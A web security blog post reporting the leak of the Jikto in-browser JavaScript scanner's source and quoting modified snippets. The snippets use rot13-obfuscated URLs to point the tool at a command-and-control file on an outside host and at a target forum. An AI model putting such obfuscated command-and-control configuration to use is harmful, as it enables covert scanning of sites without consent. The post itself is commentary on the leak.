Update: Just to be clear this was not intentionally leaked. The source was in fact stolen by one of the audience participants. See the comments for details.
Well, I’m back! No, all that mess yesterday was not for real - I did not get an offer from Google, and I did not sell my site to a 13 year old girl. It might come to a surprise to some of you, but I do like to have fun once in a while. Anyway, back to the webappsec stuff. This weekend the source of Jikto was officially leaked. How long did that take? Anyone time it? So much for this statement: “Although I will not be releasing the source code of Jikto….” There are a few things to note, although I haven’t gotten through all of it.
Firstly, it is only made up of a test HTML page, a single .JS file and a command and control file. Secondly, by the time I had received it, it had already been modified at least a few times, perhaps to test it, but nevertheless it is no longer the original function. Here’s a few snippets from the modification (cleaned up, for readability if you can believe that):
var GUIURL = rot13(”uggc://jjj.cragrfg.vg/wvxgb/pbageby.gkg”); //http://www.pentest.it/jikto/control.txt //http://localhost/JiktoControl/Collect.aspx?type= // uggc://ybpnyubfg/WvxgbPbageby/Pbyyrpg.nfck?glcr=
//var startUrlString = rot13(”uggc://mreb.jronccfrphevgl.pbz/”);
var startUrlString = rot13(”uggc://oynpxung-sbehzf.pbz/cucOO2/vaqrk.cuc”); //http://blackhat-forums.com/phpBB2/index.php uggc://oynpxung-sbehzf.pbz/cucOO2/vaqrk.cuc